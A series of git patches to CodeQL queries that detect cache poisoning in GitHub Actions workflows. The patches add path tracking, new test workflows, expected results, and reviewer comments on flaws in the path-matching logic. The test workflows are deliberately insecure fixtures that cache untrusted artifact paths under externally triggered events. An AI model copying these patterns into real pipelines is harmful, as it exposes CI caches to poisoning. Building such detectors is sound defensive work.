SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and this.getArgument("bundler-cache") = "true" } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fba33bb8bc87..7cfda4da49cb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,6 +1,12 @@ import actions import codeql.actions.DataFlow +string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -68,7 +74,9 @@ predicate containsHeadRef(string s) { } /** Checkout of a Pull Request HEAD */ -abstract class PRHeadCheckoutStep extends Step { } +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} /** Checkout of a Pull Request HEAD ref */ abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } @@ -138,6 +146,12 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ @@ -194,6 +208,12 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -216,6 +236,8 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -235,6 +257,8 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ 
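Review bot: `getStepCWD()` takes no argument, so the TODO it carries ("Read it from the step's CWD, workspace or look for a cd command") cannot be implemented without changing its signature and every `override string getPath() { result = getStepCWD() }` that this commit introduces; declaring it as `string getStepCWD(Run run)` from the start, with the current body as the placeholder, keeps the four Run-based checkout overrides stable as `result = getStepCWD(this)`. It is exported from a file other modules import and has no QLDoc; a `/** Gets the working directory a git or gh checkout in this Run step writes to. Placeholder: currently always "?". */` would make its stub status visible to callers. The `ActionsMutableRefCheckout` and `ActionsSHACheckout` overrides return the raw `path` input without the `splitAt("\n")` their cache counterparts apply; that is fine if a checkout path is always single-line, but a comment saying so would stop the next reader from "fixing" the asymmetry.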
@@ -256,6 +280,8 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -274,4 +300,6 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } From c5314aeb6c1e7497733f539c783ce5d7ec083bc9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:27 +0200 Subject: [PATCH 451/707] Add new tests --- .../CWE-349/.github/workflows/test22.yml | 35 +++++++++++++++++++ .../CWE-349/.github/workflows/test23.yml | 35 +++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml new file mode 100644 index 000000000000..f8e1dabf565c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml
new file mode 100644
index 000000000000..3f35068eb7dc
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml
@@ -0,0 +1,35 @@
+name: Test
+
+on:
+ issue_comment:
+
+permissions:
+ actions: write
+
+jobs:
+ generate-results:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.10"
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ./results/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+ - name: Download artifact
+ uses: actions/download-artifact@v4
+ with:
+ name: results
+ path: results/
+ - name: Upload results
+ uses: actions/upload-artifact@v4
+ with:
+ name: results
+ path: results/
+ if-no-files-found: ignore
From 34b48d559b17536e9274f0bcf9e462ab5a8aeb57 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 5 Aug 2024 23:45:51 +0200
Subject: [PATCH 452/707] Add expected tests results
---
 .../Security/CWE-349/CachePoisoning.expected | 52 +++++++++++--------
 1 file changed, 30 insertions(+), 22 deletions(-)
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index 994beb3b74f5..2ad477a2a8bb 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -64,26 +64,34 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | +| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | +| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | +| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | +| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | +| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | +| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | 
.github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test8.yml:37:9:37:75 | Run 
Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | -| 
.github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | From 2273aadb4bc0b80bc48eec448de0b6405a5e32ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:47:00 +0200 Subject: [PATCH 453/707] Improve Cache Poisoning query The untrusted files path is compared with the path written to the cache to check if the cache can really be poisoned --- ql/src/Security/CWE-349/CachePoisoning.ql | 52 ++++++++++++++++++++--- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 6609dae2b7f6..3f2bb8db472b 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -18,19 +18,47 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[cache_path, untrusted_path] +predicate controlledCachePath(string cache_path, string untrusted_path) { + exists(string normalized_cache_path, string normalized_untrusted_path | + ( + cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") + or + normalized_cache_path = cache_path.regexpReplaceAll("/$", "") + ) and + ( + untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and + normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") + or + normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") + ) and + normalized_cache_path.substring(0, normalized_untrusted_path.length()) = + normalized_untrusted_path + ) +} + query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step artifact, Step s +from LocalJob j, Event e, Step source, Step s, string message, string path where ( - artifact instanceof PRHeadCheckoutStep or - artifact instanceof UntrustedArtifactDownloadStep + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." 
and + path = source.(UntrustedArtifactDownloadStep).getPath() ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -43,19 +71,29 @@ where ) ) and // the job checkouts untrusted code from a pull request - j.getAStep() = artifact and + j.getAStep() = source and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep and + ( + // we dont know what code can be controlled by the attacker + path = "?" + or + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from the path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - artifact.getAFollowingStep() = s and + source.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, artifact, s, "Potential cache poisoning in the context of the default branch" +select s, source, s, "Potential cache poisoning in the context of the default branch" + message From 14f1672e740dae8beb881e5b895c73f443e5437c Mon Sep 17 00:00:00 2001 
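Review bot: `controlledCachePath` decides containment with a bare string-prefix test (`normalized_cache_path.substring(0, normalized_untrusted_path.length()) = normalized_untrusted_path`), so an untrusted path `./results` also matches a cache path `./results-old` or `./resultsX`, and an untrusted `.` matches `../foo`. Require a separator at the boundary instead: `normalized_cache_path = normalized_untrusted_path or normalized_cache_path.substring(0, normalized_untrusted_path.length() + 1) = normalized_untrusted_path + "/"`. A second gap is the normalisation regex `^[a-zA-Z0-9_-].*`: relative paths that start with a dot (`.cache`, `.github`) or with a glob (`**/node_modules`, a common shape for an `actions/cache` `path` entry) never receive the `./` prefix and therefore silently fail to match a `./`-prefixed untrusted path, turning a possible hit into a false negative; either prefix everything that does not begin with `/`, `~`, `$`, `./` or `../`, or treat any path containing `*` as unknown so it still reaches the `"?"` branch of the `where` clause. The `where` clause is split across the two hunks here, with a few lines between them outside this view.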
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:54:26 +0200 Subject: [PATCH 454/707] Fix query message --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 45 ++++++++++--------- 2 files changed, 24 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3f2bb8db472b..3807cb4b592d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -96,4 +96,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, source, s, "Potential cache poisoning in the context of the default branch" + message +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2ad477a2a8bb..fdaf0cf25ad1 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -73,25 +73,26 @@ edges | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. 
| -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branchdue to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
